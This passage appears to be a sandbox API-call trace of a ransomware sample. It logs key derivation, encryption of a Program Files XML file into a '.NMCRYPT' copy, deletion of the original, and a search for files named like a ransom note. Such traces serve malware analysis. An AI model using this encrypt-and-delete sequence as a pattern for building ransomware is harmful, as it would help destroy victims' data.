pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.468] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.468] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.469] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0156.469] CryptHashData (hHash=0x9ad278, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.469] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad778) returned 1 [0156.469] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.469] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.469] wcslen (_String="\\\\?\\") returned 0x4 [0156.469] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad2b8) returned 1 [0156.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.470] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=384) returned 1 [0156.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.470] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.471] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.471] GetLastError () returned 0x0 [0156.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.492] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x80, lpOverlapped=0x0) returned 1 [0156.492] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x80, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x90) returned 1 [0156.492] GetLastError () returned 0x0 [0156.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x90, lpOverlapped=0x0) returned 1 [0156.492] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.492] WriteFile (in: hFile=0x588, lpBuffer=0x607d60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0156.493] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", dwFileAttributes=0x20) returned 0 [0156.493] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 1 [0156.493] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0 [0156.493] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" [0156.493] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 1 [0156.493] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD678.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd678.tmp")) returned 0xd678 [0156.625] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD678.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd678.tmp"), dwFlags=0x1) returned 0 [0156.625] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD678.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd678.tmp")) returned 1 [0156.625] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0156.625] wcslen (_String="OK") returned 0x2 [0156.625] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.625] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.625] CryptDestroyKey (hKey=0x9ad778) returned 1 [0156.625] CryptDestroyHash (hHash=0x9ad278) returned 1 [0156.625] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0156.625] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*NMCRYPT") returned 0 [0156.625] PathMatchSpecW (pszFile="keypadbase.xml", pszSpec="*Recovers your files.html") returned 